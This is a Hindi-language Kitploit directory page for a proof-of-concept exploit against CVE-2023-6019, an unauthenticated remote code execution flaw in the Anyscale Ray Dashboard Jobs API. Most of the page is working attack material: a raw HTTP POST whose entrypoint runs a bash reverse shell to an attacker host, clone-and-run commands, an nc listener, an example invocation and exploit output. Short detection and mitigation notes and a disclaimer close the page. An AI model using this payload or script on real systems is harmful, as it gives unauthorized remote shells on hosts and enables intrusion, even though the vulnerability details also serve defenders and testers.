Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/joaquinrrr/cve-2023-6019
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

CVE-2023-6019 के लिए PoC एक्सप्लॉइट जो Anyscale Ray Dashboard में Jobs API के माध्यम से बिना प्रमाणीकरण के रिमोट कोड एक्ज़ीक्यूशन को लक्षित करता है। कमजोर Ray इंस्टेंसेस (< 2.6.4) पर रिवर्स शेल प्रदान करता है।

रिपॉजिटरी देखें
6112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6019 - Anyscale Ray डैशबोर्ड अप्रमाणित RCE

CVE-2023-6019 के लिए PoC शोषण — बिना प्रमाणीकरण के Ray डैशबोर्ड Jobs API के माध्यम से रिमोट कोड निष्पादन।
oguiii द्वारा निर्मित


विवरण

Anyscale Ray वितरित ML/AI कार्यभार के लिए एक ओपन-सोर्स फ्रेमवर्क है। 2.6.4 से पहले के संस्करण Ray डैशबोर्ड (डिफ़ॉल्ट पोर्ट 8265) के माध्यम से Jobs सबमिशन API को बिना किसी प्रमाणीकरण के उजागर करते हैं, जिससे एक अप्रमाणित हमलावर मनमाने कार्य सबमिट कर सकता है और होस्ट पर रिमोट कोड निष्पादन प्राप्त कर सकता है।

  • CVE: CVE-2023-6019
  • गंभीरता: गंभीर (CVSS 9.8)
  • प्रभावित संस्करण: Ray < 2.6.4
  • समाधान: Ray 2.6.4 में
  • हमला वेक्टर: नेटवर्क (अप्रमाणित HTTP अनुरोध)

यह कैसे काम करता है

/api/jobs/ एंडपॉइंट एक JSON पेलोड स्वीकार करता है जिसमें entrypoint फ़ील्ड होता है, जिसे Ray कर्मचारी प्रक्रिया द्वारा शेल कमांड के रूप में निष्पादित किया जाता है - कोई क्रेडेंशियल आवश्यक नहीं।

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

उपयोग

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

आर्गुमेंट

फ़्लैगविवरणडिफ़ॉल्ट
-tलक्ष्य IP या होस्टनामआवश्यक
-pRay डैशबोर्ड पोर्ट8265
-lहमलावर IP (रिवर्स शेल)आवश्यक
-lpहमलावर पोर्ट (रिवर्स शेल)आवश्यक

उदाहरण

root@kitploit:~
# लिसनर शुरू करें
nc -lvnp 4444

# शोषण चलाएं
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

अपेक्षित आउटपुट

root@kitploit:~
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

पता लगाना

अपने HTTP लॉग या नेटवर्क ट्रैफ़िक में पोर्ट 8265 पर /api/jobs/ के लिए अप्रत्याशित POST अनुरोधों की तलाश करें।


शमन

  • Ray >= 2.6.4 में अपग्रेड करें
  • फ़ायरवॉल नियमों के माध्यम से Ray डैशबोर्ड पोर्ट (8265) तक पहुंच प्रतिबंधित करें
  • Ray डैशबोर्ड को सार्वजनिक नेटवर्क पर उजागर न करें

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

अस्वीकरण

यह उपकरण केवल अधिकृत प्रवेश परीक्षण और शैक्षिक उद्देश्यों के लिए है।
लेखक इस उपकरण के दुरुपयोग या इससे होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं है।
परीक्षण से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें